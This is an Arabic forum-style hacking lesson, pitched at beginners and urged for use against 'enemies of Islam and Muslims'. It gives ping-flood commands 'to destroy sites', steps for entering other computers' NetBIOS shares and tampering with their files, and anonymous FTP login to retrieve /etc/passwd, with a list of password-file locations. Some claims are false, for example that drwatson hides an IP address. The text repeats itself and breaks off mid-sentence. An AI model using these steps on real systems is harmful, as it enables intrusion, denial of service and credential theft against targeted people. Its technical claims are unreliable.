ﺳﻢ ﺍﻟﻠﻪ ﺍﻟﺮﺣﻤﻦ ﺍﻟﺮﺣﻴﻢ
ﺑﺼﺮﺍﺣﺔ ﺍﻟﻴﻮﻡ ﺟﺎﻳﺐ ﺩﺭﺱ ﻣﻬﻢ ﺟﺪﺍ
ﻭﻻﺯﻡ ﺗﻘﺮﺍﻩ ﻭﺍﻧﺖ ﻣﺮﻛﺰ ﻳﻌﻨﻲ ﺍﺫﺍ
ﻣﺎﻓﻬﻤﺖ ﺍﻟﺪﺭﺱ ﺍﻧﺎ ﺑﻘﻠﻚ ﻟﻌﺎﺩ ﺗﻜﻤﻞ
ﻓﻲ ﺩﻭﺭﺓ ﺍﻻﺧﺘﺮﺍﻕ ﻟﻠﻤﺒﺘﺪﺋﻴﻦ
ﻭﺑﺼﺮﺍﺣﺔ
ﻫﺬﺍ ﺍﻟﺪﺭﺱ ﻣﻮ ﻟﻠﻤﺒﺘﺪﺋﻴﻦ ﺍﺑﺪﺍ ﺑﺲ
ﺍﻧﺎ ﺣﺎﺑﺐ ﺍﻋﻄﻴﻜﻢ ﻓﻜﺮﻩ ﻋﻨﻮ ﻭﺍﻥ
ﺷﺎﺀ ﺍﻟﻠﻪ ﺭﺍﺡ ﺗﻔﻬﻤﻮ ﻟﻤﺎ ﺗﺮﻛﺰﻭ
ﻭﺗﻘﺮﻭ ﺍﻛﺘﺮ ﻣﻦ ﻣﺮﻩ
ﺍﻟﻄﺮﻳﻘﺔ ﻣﺠﺮﺑﺔ ﻭﺷﻐﺎﻟﻪ %100 ﻭﺍﻧﺎ
ﺑﻨﻔﺴﻲ ﻣﺠﺮﺑﻬﺎ ﻭﺍﻛﺘﺮ ﻣﻦ ﻣﺮﻩ
ﻻ ﺍﻃﻴﻞ ﻋﻠﻴﻜﻢ ﺍﺗﺮﻛﻜﻢ ﻣﻊ ﺍﻟﺸﺮﺡ
----------------------
ﻫﺬﺍ ﺍﻟﻤﻮﺿﻮﻉ ﺧﻄﻴﺮ ﺟﺪﺍ ﺃﺭﺟﻮ ﻋﺪﻡ
ﺍﻷﺳﺘﺨﺪﺍﻡ ﺇﻻﻣﻦ ﻫﻮﻋﺪﻭﻟﻺﺳﻼﻡ ﻭ
ﺍﻟﻤﺴﻠﻤﻴﻦ...
ﺍﺧﻄﺮ ﻭﺍﻏﺮﺏ ﺍﻷﻭﺍﻣﺮ ﺑﺎﻟﺪﻭﺱ
ﻟﻠﻬﻜﺮ:
ﻟﺘﺪﻣﻴﺮ ﺍﻟﻤﻮﺍﻗﻊ:
ping -t [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻫﺬﺍ ﺍﻷﻣﺮ ﻳﻘﻮﻡ ﺑﺎﻟﻀﻐﻂ ﻋﻠﻰ
ﺍﻟﻤﻀﻴﻒ
ping -t -a -f [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﺃﻣﺎﻫﺬﺍ ﺍﻷﻣﺮ ﺍﻟﺸﺎﻃﺮ ﻓﻴﻘﻮﻡ ﺑﺎﻋﻄﺎﺀ
ﺍﻻﻭﺍﻣﺮ ﻟﻠﻤﺴﺘﻀﻴﻒ
ping [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻭﻫﺬﺍ ﺍﻷﻣﺮ ﻳﻘﻮﻡ ﺑﺎﻋﻄﺎﺀﻙ ﺍﻱ ﺑﻲ
ﺍﻟﻤﻮﻗﻊ ﻭﻳﺴﺘﺨﺪﻡ ﺍﻻﻱ ﺑﻲ ﻟﻠﺘﺪﻣﻴﺮ
ﻣﺜﻼً ﺑﻴﻨﺞ " ping"ﺑﻌﺪﻫﺎ ﺍﻻﻱ ﺑﻲ
com/com.wav
com3/com3/.wav
com1/com.wav
ﻭﻫﺬﻩ ﺍﻻﻭﺍﻣﺮ ﻟﻠﻬﺠﻮﻡ ﺍﻛﺘﺐ ﺍﻟﻤﻮﻗﻊ
ﺃﻭﻫﺬﺍ ﺍﻻﻣﺮ ﺃﻭ ﺍﻻﻱ ﺑﻲ ﻳﻜﻮﻥ ﺍﻓﻀﻞ
ping -w timeout
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻭﻫﺬﺍ ﺍﻻﻣﺮ ﻳﺴﺘﻌﻤﻞ ﻟﻤﻌﺮﻓﺔ ﺳﺮﻋﺔ
ﺍﻟﻤﻮﺍﻗﻊ
NETSTAT -S
ﻫﺬﻩ ﺍﻟﻤﻨﺎﻓﺬ ﻓﻲ ﺟﻬﺎﺯﻙ
NETSTAT -A
ﻫﺬﺍ ﺍﻻﻣﺮ ﻟﺘﺮﻯﺎﻟﻤﻨﺎﻓﺬ ﻭﻣﻦ ﻣﺮﺗﺒﻂ
ﻣﻌﻚ ﺑﺎﻟﺒﺮﻭﺗﻜﻞ ﻳﻌﻨﻲ ﺗﺸﻮﻑ ﻣﻦ
ﻳﺤﺎﻭﻝ ﻳﺨﺘﺮﻗﻚ
NETSTAT -N
ﻫﺬﺍ ﺍﻻﻣﺮ ﻷﺧﺮﺍﺝ ﺍﻻﻱ ﺑﻲ ﺍﺭﺳﻞ ﺍﻱ
ﻣﻠﻒ ﻟﻤﻦ ﻣﻌﻚ ﻋﻠﻰ ﺍﻟﻤﺎﺳﻨﺠﺮ ﻭﻫﻮ
ﻳﺤﻤﻞ ﺍﻛﺘﺒﻪ ﺳﻴﺄﺗﻴﻚ ﺍﻻﻱ ﺑﻲ ﺍﺧﺮ
ﺷﻲ ﻋﻠﻰ ﺍﻟﻴﻤﻴﻦ ﻫﺬﺍ ﻫﻮ ﻭﺍﺧﺮ ﺷﻲ
ﻋﻠﻰ ﺍﻟﻴﺴﺎﺭ ﻳﻮﻭ ﻳﻌﻨﻲ ﺍﻧﺖ
NETSTAT -P
ﻫﺬﺍ ﻣﻨﺎﻓﺬ ﺍﻟﺒﺮﻭﺗﻜﻮﻛﻞ
drwatson
ﻫﺬﺍ ﺍﻻﻣﺮ ﻷﺧﻔﺎﺀ ﺍﻻﻱ ﺑﻲ
ﻭﺍﻻﻥ ﻫﺬﻩ ﺍﻭﺍﻣﺮ ﺧﻄﻴﺮﺓ
ﺍﻹﺧﺘﺮﺍﻕ ﻋﻦ ﻃﺮﻳﻖ NetBios
Attack
ﻫﺬﻩ ﺍﻟﺜﻐﺮﺓ ﺗﻈﻬﺮ ﺑﺼﻮﺭﺓ ﺧﺎﺻﺔ ﺇﺫﺍ
ﻣﺎ ﻛﺎﻥ ﻟﺪﻳﻚ Home Network ﺃﻭ
ﺃﻯ ﻧﻮﻉ ﺍﺧﺮ ﻣﻦ ﺃﻧﻮﺍﻉ ﺍﻟﺸﺒﻜﺎﺕ ﻣﺜﻞ
LAN ﺃﻭ WAN ﺃﻭ MAN ﻭﻏﻴﺮﻫﺎ ،
ﺃﻳﻀﺎ ﻳﻤﻜﻦ ﺇﺧﺘﺮﺍﻕ ﺣﺎﺳﺒﻚ
ﺍﻟﺸﺨﺼﻰ ﺇﺫﺍ ﻛﺎﻧﺖ ﻟﺪﻳﻚ ﺗﻠﻚ ﺍﻟﺜﻐﺮﺓ.
ﻭﻟﻠﺘﺠﺮﺑﺔ ﻋﻠﻰ ﻧﻔﺴﻚ ﻛﻤﺜﺎﻝ :
ﺃﺣﺼﻞ ﻋﻠﻰ IP ﺍﻟﺨﺎﺹ ﺑﺠﻬﺎﺯﻙ
ﺑﻮﺍﺳﻄﺔ ﻫﺬﺍ ﺍﻟﺒﺮﻧﺎﻣﺞ
ﺍﻟﺼﻐﻴﺮ ".NetBios Attack"
-1 ﺑﻌﺪ ﺣﺼﻮﻟﻚ ﻋﻠﻰ IP ﺳﻴﻈﻬﺮ
ﺑﺎﻟﺸﻜﻞ ﺍﻟﺘﺎﻟﻰ 207.107.1.1 ) ﻫﺬﺍ
ﺍﻟﺮﻗﻢ ﺇﻓﺘﺮﺍﺿﻰ.(
-2 ﺍﻻﻥ ﺇﺫﻫﺐ ﺍﻟﻰ START ﺛﻢ RUN
ﺛﻢ ﺇﻛﺘﺐ CMD ﻟﺘﻔﺘﺢ ﻟﻚ ﺷﺎﺷﺔ
ﺍﻟﺪﻭﺱ .
-3 ﺇﻛﺘﺐ ﺩﺍﺧﻞ ﺷﺎﺷﺔ ﺍﻟﺪﻭﺱ
Nbtstat –A IP ADRESS : ﻻ ﺗﻨﺴﻰ
ﺃﻥ ﺗﻜﺘﺐ IP ﺍﻟﺨﺎﺹ ﺑﻚ ﻣﻜﺎﻥ IP
ADRESS ، ﺛﻢ ﺇﺿﻐﻂ ENTER .
-4 ﺳﻴﻈﻬﺮ ﻟﻚ ﺍﻟﺠﺪﻭﻝ ﺍﻟﺘﺎﻟﻰ :
NetBIOS Remote Machine
Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP
Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE
Registered
__MSBROWSE__.<01>GROUP
Registered
ﻣﻠﺤﻮﻇﺔ : ﺗﻢ ﺣﺬﻑ ﺍﻟﻤﻌﻠﻮﻣﺎﺕ
ﺍﻷﺻﻠﻴﺔ ﻣﻦ ﺍﻟﺠﺪﻭﻝ .
-5 ﺍﻟﺮﻗﻢ ﺍﻟﻈﺎﻫﺮ ﻣﺎ ﺑﻴﻦ <> ﻳﻄﻠﻖ
ﻋﻠﻴﻪ HEX CODE VALUE ، ﻭﻣﺎ ﻳﻬﻤﻨﺎ
ﻫﻨﺎ ﺃﻥ ﻧﺠﺪ ﺭﻗﻢ 20 ﻣﺎ ﺑﻴﻦ
ﺍﻷﻗﻮﺍﺱ ﻭﻫﺬﺍ ﻳﻌﻨﻰ ﺃﻧﻨﺎ ﻟﺪﻳﻨﺎ
PRINTER OR FILES SHARED
TURNED ON ، ﻭﻫﻮ ﻣﺎ ﻳﻌﻨﻰ ﺃﻧﻨﺎ
ﻟﺪﻳﻨﺎ ﺷﺨﺺ ﻟﺪﻳﺔ ﻣﻠﻔﺎﺕ ﻭﻃﺎﺑﻌﺔ
ﻳﻤﻜﻦ ﻣﺸﺎﺭﻛﺘﻬﺎ ﻋﺒﺮ ﺍﻹﻧﺘﺮﻧﺖ ﻭﻫﺬﺍ
ﻋﻴﺐ ﺧﻄﻴﺮ ﻓﻲ ﺃﻧﻈﻤﺔ ﺍﻟﺘﺸﻐﻴﻞ
ﻭﺛﻐﺮﺓ ﺧﻄﻴﺮﺓ ﻳﻤﻜﻦ ﺇﺳﺘﻐﻼﻟﻬﺎ ﻓﻲ
ﺇﺧﺘﺮﺍﻗﻪ.
-6 ﺍﻻﻥ ﻳﻤﻜﻨﻚ ﺍﻟﺘﻌﺮﻑ ﻋﻠﻰ
ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ ﻳﻤﻜﻦ ﻣﺸﺎﺭﻛﺘﻬﺎ ﺃﻭ
ﺍﻟﺘﻐﻴﻴﺮ ﻓﻴﻬﺎ ﻭﺍﻟﺘﻼﻋﺐ ﺑﻬﺎ ﻛﻴﻔﻤﺎ ﺗﺸﺎﺀ
ﻭﺫﻟﻚ ﺑﻜﺘﺎﺑﺔ ﺍﻷﻣﺮ ﺍﻟﺘﺎﻟﻰ ﻓﻲ ﺷﺎﺷﺔ
ﺍﻟﺪﻭﺱ:
Net view \\<insert ip_address
here>
-7 ﺳﻮﻑ ﻳﻈﻬﺮ ﻟﻚ ﺍﻟﺠﺪﻭﻝ ﺍﻟﺘﺎﻟﻰ
ﺍﻟﺬﻯ ﻳﺪﻝ ﻋﻠﻰ ﻭﺟﻮﺩ ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ
ﻳﻤﻜﻦ ﺍﻟﺘﻼﻋﺐ ﻓﻴﻬﺎ :
Shared resources at \
\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
-8 ﺍﻻﻥ ﻳﻤﻜﻨﻚ ﺍﻟﺪﺧﻮﻝ ﺍﻟﻰ ﻣﻠﻒ
TEMP ﻭﺍﻟﺘﻼﻋﺐ ﻓﻴﻪ :
Net use x: \\<insert IP address
here>\temp
ﻃﺒﻌﺎ ﺇﺳﻠﻮﺏ NSETBIOS ﻣﺮ ﺑﺎﻟﻌﺪﻳﺪ
ﻣﻦ ﺍﻟﺘﻄﻮﺭﺍﺕ ، ﻧﻈﺮﺍ ﻷﻥ ﺍﻟﻌﺪﻳﺪ ﻣﻦ
ﺍﻟﻤﺴﺘﺨﺪﻣﻴﻦ ﻭﺃﻧﻈﻤﺔ ﺍﻟﺘﺸﻐﻴﻞ ﻗﺪ
ﺗﻼﻓﻮﺍ ﻫﺬﻩ ﺍﻟﺜﻐﺮﺓ ﺍﻟﺨﻄﻴﺮﺓ ﻟﺪﻳﻬﻢ ،
ﺑﺈﺫﻥ ﺍﻟﻠﻪ ﺳﺄﻗﺪﻡ ﺍﻟﻄﺮﻕ ﺍﻷﺧﺮﻯ
ﺍﻷﻛﺜﺮ ﺗﻄﻮﺭﺍ ﻓﻲ ﻭﻗﺖ ﻻﺣﻖ ..
* ﻟﻜﻲ ﺗﺴﺘﻄﻴﻊ ﺍﺧﺘﺮﺍﻕ ﻣﻮﻗﻊ ﻻ ﺑﺪ
ﺃﻥ ﺗﻌﺮﻑ ﺍﺳﻢ ﺍﻟﻤﺴﺘﺨﺪﻡ ﻭﻛﻠﻤﺔ
ﺍﻟﻤﺮﻭﺭ ﺍﻟﺨﺎﺻﺔ ﺑﺎﻟﻤﻮﻗﻊ
User name-Password
ﻭﻫﻤﺎ ﻳﻜﻮﻧﺎﻥ ﻣﺤﻔﻮﻇﻴﻦ ﻓﻲ ﻣﻠﻒ
ﻳﺴﻤﻲ
PASSWD ﻏﺎﻟﺒﺎ
ﺑﻌﺾ ﺍﻟﻤﻮﺍﻗﻊ ﺗﻀﻊ ﻫﺬﺍ ﺍﻟﻤﻠﻒ ﻓﻲ
ﺍﻹﻑ ﺗﻲ ﺑﻲ
ﻣﺎ ﻫﻮ ﺇﻑ ﺗﻲ ﺑﻲ؟
FTP=File Transfer Protocol
ﺑﺮﻭﺗﻮﻛﻮﻝ ﻧﻘﻞ ﺍﻟﻤﻠﻔﺎﺕ
ﺗﺴﺘﻄﻴﻊ ﺍﻻﺗﺼﺎﻝ ﺑﺎﻟﻤﻮﻗﻊ ﻭﺳﺤﺐ
ﻫﺬﺍ ﺍﻟﻤﻠﻒ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺘﻠﻨﺖ
start==>run ﺇﺑﺪﺃ ﺛﻢ ﺗﺸﻐﻴﻞ
ﻭﺍﻛﺘﺐ telnet
ﺳﻴﻔﺘﺢ ﺍﻟﺘﻠﻨﺖ ﺍﺿﻐﻂ ﻋﻠﻰRemote
System ==> connect
ﺛﻢ ﺍﻛﺘﺐ ﺍﻟﻤﻮﻗﻊ ﻓﻲ Host Name
ﻣﺜﻼ
kahane.org ﺃﻭ ﺍﻵﻳﺒﻲ ﺍﻟﺨﺎﺹ ﺑﻪ
ﻭﻓﻲ PORT ﺍﻛﺘﺐ 21 ﻭﻫﻮ ﺍﻟﺒﻮﺭﺕ
ﺍﻟﺨﺎﺹ ﺑﺎﻹﻑ ﺗﻲ ﺑﻲ
ﺛﻢ ﺍﺿﻐﻂ connect
ﻭﺑﻌﺪ ﺃﻥ ﻳﻈﻬﺮ ﺭﺩ ﺍﻟﺴﻴﺮﻓﺮ ﺍﻛﺘﺐ
ﻭﻟﻜﻦ..ﻟﻦ ﺗﺮﻯ ﻣﺎ ﻛﺘﺒﺖ!! ﺷﻔﺮﺓ
source code
user anonymous
ﺛﻢ ﺍﻧﺘﺮ ﺑﻌﺪﻫﺎ ﻳﻄﻠﺐ ﺍﻟﺴﻴﺮﻓﺮ ﻛﻠﻤﺔ
ﺍﻟﺴﺮ ﺍﻛﺘﺐ
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﺍﻛﺘﺐ ﺃﻱ ﺑﺮﻳﺪ ﻛﻜﻠﻤﺔ ﺳﺮ ﻭﻃﺒﻌﺎ
ﺳﻴﻜﻮﻥ ﻭﻫﻤﻴﺎ
ﻣﺎﺫﺍ ﻓﻌﻠﻨﺎ؟ﻟﻘﺪ ﺩﺧﻠﻨﺎ ﺇﻟﻰ ﺳﻴﺮﻓﺮ
ﺍﻟﻤﻮﻗﻊ ﻓﻲ ﻭﺿﻊ ﺍﻟﺘﺨﻔﻲ ﻭﺑﻌﺾ
ﺍﻟﻤﻮﺍﻗﻊ ﺗﺴﻤﺢ ﺑﻬﺬﻩ ﺍﻟﺨﺎﺻﻴﺔ
ﻭﺑﻌﻀﻬﺎ ﻻ ﻳﺴﻤﺢ..
ﺑﻌﺪﻫﺎ ﺳﻨﺤﺼﻞ ﻋﻠﻰ ﻣﻠﻒ
ﺍﻟﺒﺎﺳﻮﻭﺭﺩ
ﻗﺒﻞ ﺫﻟﻚ ﺃﺣﺐ ﺃﻥ ﺃﺫﻛﺮ ﺃﻧﻪ ﻳﻤﻜﻨﻚ
ﻋﻤﻞ ﺍﻷﺷﻴﺎﺀ ﺍﻟﺴﺎﺑﻘﺔ ﻋﻦ ﻃﺮﻳﻖ
ﺃﻱ ﺑﺮﻧﺎﻣﺞ ﺇﻑ ﺗﻲ ﺑﻲ ﻣﺜﻞ
cute ftp - ws_ftp
ﻣﺜﻼﺃﻭ ﺣﺘﻰ ﺍﻟﺬﻫﺎﺏ ﺇﻟﻰ ﺍﻟﻤﺘﺼﻔﺢ
ﻭﻛﺘﺎﺑﺔ ﺍﻟﻤﻮﻗﻊ ﻫﻜﺬﺍ ﻓﻲ ﺣﻘﻞ
ﺍﻟﻌﻨﻮﺍﻥ
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻟﺘﺤﺼﻞ ﻋﻠﻰ ﺍﻟﻤﻠﻒ ﻓﻲ ﺍﻟﺘﻠﻨﺖ ﺍﻛﺘﺐ
retr /etc/passwd
/etc ﻫﻮ ﺍﻟﻤﺠﻠﺪ ﺍﻟﺬﻱ ﻳﺤﺘﻮﻱ ﺍﻟﻤﻠﻒ
passwd ﻭﻳﺨﺘﻠﻒ ﺍﺳﻢ ﺍﻟﻤﺠﻠﺪ
ﻭﺍﺳﻢ ﻣﻠﻒ ﺍﻟﺒﺎﺳﻮﻭﺭﺩ ﺑﺎﺧﺘﻼﻑ
ﻧﻈﺎﻡ ﺗﺸﻐﻴﻞ ﺍﻟﻤﻮﻗﻊ
Sunos 5.0 etc/shadow ﺍﻭ etc/
passwd
Linux etc/shadow ﺍﻭ etc/
passwd
BSD4.3 –RENO etc/
master.passwd
AIX etc/security/passwd
NT ﻭﻳﻨﺪﻭﺯ scripts/passwd
ﻭﺗﺨﺘﻠﻒ ﺃﺳﻤﺎﺀ ﻣﻠﻒ ﺍﻟﺒﺎﺳﻮﻭﺭﺩ ﺑﻴﻦ
passwd ﻭ admin.pwl ﻭ ﻏﻴﺮﻫﺎ::
-------------------------------------
ﻓﻲ ﻣﻼﺣﻈﺔ ﺍﻟﻜﻞ ﺍﻻﻥ ﻳﻤﻜﻦ ﻗﺎﻋﺪ
ﻳﺪﻭﺭ ﻋﻠﻴﻬﺎ ﻭﻫﻲ ﻛﺎﻟﺘﺎﻟﻲ
=== ﻛﻴﻒ ﺍﻃﻠﻊ ip ﺍﻟﺨﺎﺹ ﻓﻴﻨﻲ
====
ﺍﻗﻠﻚ ﻛﻴﻒ ﺍﻟﻄﺮﻳﻘﺔ ﺍﺳﻬﻞ ﻣﻦ
ﺍﻟﺴﻬﻞ === ﺍﺩﺧﻞ ﺍﻟﺪﻭﺱ ﻭﺍﻛﺘﺐ
ﺍﻻﻣﺮ ﺍﻟﺘﺎﻝ(ipconfig)
ﺭﺍﺡ ﻳﻄﻠﻌﻠﻚ ﻣﻌﻠﻮﻣﺎﺕ ﻛﺘﻴﺮﻩ ﻭﻣﻦ
ﺿﻤﻨﻬﺎ ﻫﺎﻟﻤﻌﻠﻮﻣﻪ ﻫﻲ ) IPv4
Address. . . . . . . . . . . :
192.***.*.3(
ﺍﺗﻤﻨﻰ ﺗﻜﻮﻥ ﻭﺿﺤﺔ ﺍﻟﺼﻮﺭﻩ
ﺑﺼﺮﺍﺣﺔ ﺍﻟﻴﻮﻡ ﺟﺎﻳﺐ ﺩﺭﺱ ﻣﻬﻢ ﺟﺪﺍ
ﻭﻻﺯﻡ ﺗﻘﺮﺍﻩ ﻭﺍﻧﺖ ﻣﺮﻛﺰ ﻳﻌﻨﻲ ﺍﺫﺍ
ﻣﺎﻓﻬﻤﺖ ﺍﻟﺪﺭﺱ ﺍﻧﺎ ﺑﻘﻠﻚ ﻟﻌﺎﺩ ﺗﻜﻤﻞ
ﻓﻲ ﺩﻭﺭﺓ ﺍﻻﺧﺘﺮﺍﻕ ﻟﻠﻤﺒﺘﺪﺋﻴﻦ
ﻭﺑﺼﺮﺍﺣﺔ
ﻫﺬﺍ ﺍﻟﺪﺭﺱ ﻣﻮ ﻟﻠﻤﺒﺘﺪﺋﻴﻦ ﺍﺑﺪﺍ ﺑﺲ
ﺍﻧﺎ ﺣﺎﺑﺐ ﺍﻋﻄﻴﻜﻢ ﻓﻜﺮﻩ ﻋﻨﻮ ﻭﺍﻥ
ﺷﺎﺀ ﺍﻟﻠﻪ ﺭﺍﺡ ﺗﻔﻬﻤﻮ ﻟﻤﺎ ﺗﺮﻛﺰﻭ
ﻭﺗﻘﺮﻭ ﺍﻛﺘﺮ ﻣﻦ ﻣﺮﻩ
ﺍﻟﻄﺮﻳﻘﺔ ﻣﺠﺮﺑﺔ ﻭﺷﻐﺎﻟﻪ %100 ﻭﺍﻧﺎ
ﺑﻨﻔﺴﻲ ﻣﺠﺮﺑﻬﺎ ﻭﺍﻛﺘﺮ ﻣﻦ ﻣﺮﻩ
ﻻ ﺍﻃﻴﻞ ﻋﻠﻴﻜﻢ ﺍﺗﺮﻛﻜﻢ ﻣﻊ ﺍﻟﺸﺮﺡ
----------------------
ﻫﺬﺍ ﺍﻟﻤﻮﺿﻮﻉ ﺧﻄﻴﺮ ﺟﺪﺍ ﺃﺭﺟﻮ ﻋﺪﻡ
ﺍﻷﺳﺘﺨﺪﺍﻡ ﺇﻻﻣﻦ ﻫﻮﻋﺪﻭﻟﻺﺳﻼﻡ ﻭ
ﺍﻟﻤﺴﻠﻤﻴﻦ...
ﺍﺧﻄﺮ ﻭﺍﻏﺮﺏ ﺍﻷﻭﺍﻣﺮ ﺑﺎﻟﺪﻭﺱ
ﻟﻠﻬﻜﺮ:
ﻟﺘﺪﻣﻴﺮ ﺍﻟﻤﻮﺍﻗﻊ:
ping -t [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻫﺬﺍ ﺍﻷﻣﺮ ﻳﻘﻮﻡ ﺑﺎﻟﻀﻐﻂ ﻋﻠﻰ
ﺍﻟﻤﻀﻴﻒ
ping -t -a -f [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﺃﻣﺎﻫﺬﺍ ﺍﻷﻣﺮ ﺍﻟﺸﺎﻃﺮ ﻓﻴﻘﻮﻡ ﺑﺎﻋﻄﺎﺀ
ﺍﻻﻭﺍﻣﺮ ﻟﻠﻤﺴﺘﻀﻴﻒ
ping [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻭﻫﺬﺍ ﺍﻷﻣﺮ ﻳﻘﻮﻡ ﺑﺎﻋﻄﺎﺀﻙ ﺍﻱ ﺑﻲ
ﺍﻟﻤﻮﻗﻊ ﻭﻳﺴﺘﺨﺪﻡ ﺍﻻﻱ ﺑﻲ ﻟﻠﺘﺪﻣﻴﺮ
ﻣﺜﻼً ﺑﻴﻨﺞ " ping"ﺑﻌﺪﻫﺎ ﺍﻻﻱ ﺑﻲ
com/com.wav
com3/com3/.wav
com1/com.wav
ﻭﻫﺬﻩ ﺍﻻﻭﺍﻣﺮ ﻟﻠﻬﺠﻮﻡ ﺍﻛﺘﺐ ﺍﻟﻤﻮﻗﻊ
ﺃﻭﻫﺬﺍ ﺍﻻﻣﺮ ﺃﻭ ﺍﻻﻱ ﺑﻲ ﻳﻜﻮﻥ ﺍﻓﻀﻞ
ping -w timeout
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻭﻫﺬﺍ ﺍﻻﻣﺮ ﻳﺴﺘﻌﻤﻞ ﻟﻤﻌﺮﻓﺔ ﺳﺮﻋﺔ
ﺍﻟﻤﻮﺍﻗﻊ
NETSTAT -S
ﻫﺬﻩ ﺍﻟﻤﻨﺎﻓﺬ ﻓﻲ ﺟﻬﺎﺯﻙ
NETSTAT -A
ﻫﺬﺍ ﺍﻻﻣﺮ ﻟﺘﺮﻯﺎﻟﻤﻨﺎﻓﺬ ﻭﻣﻦ ﻣﺮﺗﺒﻂ
ﻣﻌﻚ ﺑﺎﻟﺒﺮﻭﺗﻜﻞ ﻳﻌﻨﻲ ﺗﺸﻮﻑ ﻣﻦ
ﻳﺤﺎﻭﻝ ﻳﺨﺘﺮﻗﻚ
NETSTAT -N
ﻫﺬﺍ ﺍﻻﻣﺮ ﻷﺧﺮﺍﺝ ﺍﻻﻱ ﺑﻲ ﺍﺭﺳﻞ ﺍﻱ
ﻣﻠﻒ ﻟﻤﻦ ﻣﻌﻚ ﻋﻠﻰ ﺍﻟﻤﺎﺳﻨﺠﺮ ﻭﻫﻮ
ﻳﺤﻤﻞ ﺍﻛﺘﺒﻪ ﺳﻴﺄﺗﻴﻚ ﺍﻻﻱ ﺑﻲ ﺍﺧﺮ
ﺷﻲ ﻋﻠﻰ ﺍﻟﻴﻤﻴﻦ ﻫﺬﺍ ﻫﻮ ﻭﺍﺧﺮ ﺷﻲ
ﻋﻠﻰ ﺍﻟﻴﺴﺎﺭ ﻳﻮﻭ ﻳﻌﻨﻲ ﺍﻧﺖ
NETSTAT -P
ﻫﺬﺍ ﻣﻨﺎﻓﺬ ﺍﻟﺒﺮﻭﺗﻜﻮﻛﻞ
drwatson
ﻫﺬﺍ ﺍﻻﻣﺮ ﻷﺧﻔﺎﺀ ﺍﻻﻱ ﺑﻲ
ﻭﺍﻻﻥ ﻫﺬﻩ ﺍﻭﺍﻣﺮ ﺧﻄﻴﺮﺓ
ﺍﻹﺧﺘﺮﺍﻕ ﻋﻦ ﻃﺮﻳﻖ NetBios
Attack
ﻫﺬﻩ ﺍﻟﺜﻐﺮﺓ ﺗﻈﻬﺮ ﺑﺼﻮﺭﺓ ﺧﺎﺻﺔ ﺇﺫﺍ
ﻣﺎ ﻛﺎﻥ ﻟﺪﻳﻚ Home Network ﺃﻭ
ﺃﻯ ﻧﻮﻉ ﺍﺧﺮ ﻣﻦ ﺃﻧﻮﺍﻉ ﺍﻟﺸﺒﻜﺎﺕ ﻣﺜﻞ
LAN ﺃﻭ WAN ﺃﻭ MAN ﻭﻏﻴﺮﻫﺎ ،
ﺃﻳﻀﺎ ﻳﻤﻜﻦ ﺇﺧﺘﺮﺍﻕ ﺣﺎﺳﺒﻚ
ﺍﻟﺸﺨﺼﻰ ﺇﺫﺍ ﻛﺎﻧﺖ ﻟﺪﻳﻚ ﺗﻠﻚ ﺍﻟﺜﻐﺮﺓ.
ﻭﻟﻠﺘﺠﺮﺑﺔ ﻋﻠﻰ ﻧﻔﺴﻚ ﻛﻤﺜﺎﻝ :
ﺃﺣﺼﻞ ﻋﻠﻰ IP ﺍﻟﺨﺎﺹ ﺑﺠﻬﺎﺯﻙ
ﺑﻮﺍﺳﻄﺔ ﻫﺬﺍ ﺍﻟﺒﺮﻧﺎﻣﺞ
ﺍﻟﺼﻐﻴﺮ ".NetBios Attack"
-1 ﺑﻌﺪ ﺣﺼﻮﻟﻚ ﻋﻠﻰ IP ﺳﻴﻈﻬﺮ
ﺑﺎﻟﺸﻜﻞ ﺍﻟﺘﺎﻟﻰ 207.107.1.1 ) ﻫﺬﺍ
ﺍﻟﺮﻗﻢ ﺇﻓﺘﺮﺍﺿﻰ.(
-2 ﺍﻻﻥ ﺇﺫﻫﺐ ﺍﻟﻰ START ﺛﻢ RUN
ﺛﻢ ﺇﻛﺘﺐ CMD ﻟﺘﻔﺘﺢ ﻟﻚ ﺷﺎﺷﺔ
ﺍﻟﺪﻭﺱ .
-3 ﺇﻛﺘﺐ ﺩﺍﺧﻞ ﺷﺎﺷﺔ ﺍﻟﺪﻭﺱ
Nbtstat –A IP ADRESS : ﻻ ﺗﻨﺴﻰ
ﺃﻥ ﺗﻜﺘﺐ IP ﺍﻟﺨﺎﺹ ﺑﻚ ﻣﻜﺎﻥ IP
ADRESS ، ﺛﻢ ﺇﺿﻐﻂ ENTER .
-4 ﺳﻴﻈﻬﺮ ﻟﻚ ﺍﻟﺠﺪﻭﻝ ﺍﻟﺘﺎﻟﻰ :
NetBIOS Remote Machine
Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP
Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE
Registered
__MSBROWSE__.<01>GROUP
Registered
ﻣﻠﺤﻮﻇﺔ : ﺗﻢ ﺣﺬﻑ ﺍﻟﻤﻌﻠﻮﻣﺎﺕ
ﺍﻷﺻﻠﻴﺔ ﻣﻦ ﺍﻟﺠﺪﻭﻝ .
-5 ﺍﻟﺮﻗﻢ ﺍﻟﻈﺎﻫﺮ ﻣﺎ ﺑﻴﻦ <> ﻳﻄﻠﻖ
ﻋﻠﻴﻪ HEX CODE VALUE ، ﻭﻣﺎ ﻳﻬﻤﻨﺎ
